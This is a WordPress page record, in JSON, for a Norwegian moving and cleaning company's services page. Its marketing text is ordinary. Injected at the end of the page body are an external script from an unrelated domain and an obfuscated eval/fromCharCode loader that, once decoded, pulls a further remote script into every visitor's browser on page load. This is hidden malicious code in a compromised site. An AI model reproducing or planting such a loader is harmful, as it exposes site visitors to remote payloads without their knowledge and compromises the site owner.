{"id":5100,"date":"2021-02-25T00:36:38","date_gmt":"2021-02-25T00:36:38","guid":{"rendered":"http:\/\/ms24.no\/?page_id=5100"},"modified":"2023-10-30T23:12:24","modified_gmt":"2023-10-30T22:12:24","slug":"spesialister-pa-flytting","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=5100","title":{"rendered":"Spesialister p\u00e5 flytting"},"content":{"rendered":"<h2>Flyttetjenester<\/h2>\n<p>&nbsp;<\/p>\n<h2>Oslo, Viken flytteservice<\/h2>\n<p>Vi har god erfaring, og strekker oss langt for \u00e5 gi personlig service og skreddersy gode l\u00f8sninger for deg som kunde. Vi garanterer god service og kvalitet i v\u00e5re tjenester.<br \/>\nFinn din ptis<\/p>\n<h2>Rydding \/ D\u00f8dsbo \/ Utvask<\/h2>\n<p>Milj\u00f8 Solutions AS kj\u00f8rer bort ditt skrot fra loft og kjeller, avfall fra hage og ellers alt du m\u00e5tte ha behov for \u00e5 kvitte deg med.<\/p>\n<p>Utvasking<\/p>\n<p>Vi tar oss av nedvasking av ditt hus eller leilighet., etter at flyttegodset er sikkert plassert i en av v\u00e5re flyttebiler.<br \/>\n<a><br \/>\nFinn din pris <\/a><\/p>\n<h2>Pakking<\/h2>\n<p>Milj\u00f8 Solutions AS er klare til \u00e5 hjelpe deg, enten det gjelder full pakking eller delvis pakking av flyttelasset ditt. V\u00e5re flyttemedarbeidere kan ta utpakkingen for deg og plassere godset etter ditt \u00f8nske. Vi tar ogs\u00e5 med oss all emballasje og annet s\u00f8ppel i forbindelse med utpakkingen. Vi leverer emballasje hvis du har bestilt flytting, men vil st\u00e5 for pakkingen selv.<br \/>\nFinn din pris<br \/>\n<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Flyttetjenester &nbsp; Oslo, Viken flytteservice Vi har god erfaring, og strekker oss langt for \u00e5 gi personlig service og skreddersy gode l\u00f8sninger for deg som kunde. Vi garanterer god service og kvalitet i v\u00e5re tjenester. Finn din ptis Rydding \/ D\u00f8dsbo \/ Utvask Milj\u00f8 Solutions AS kj\u00f8rer bort ditt skrot fra loft og kjeller, avfall [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-5100","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5100","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5100"}],"version-history":[{"count":32,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5100\/revisions"}],"predecessor-version":[{"id":5920,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5100\/revisions\/5920"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5100"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}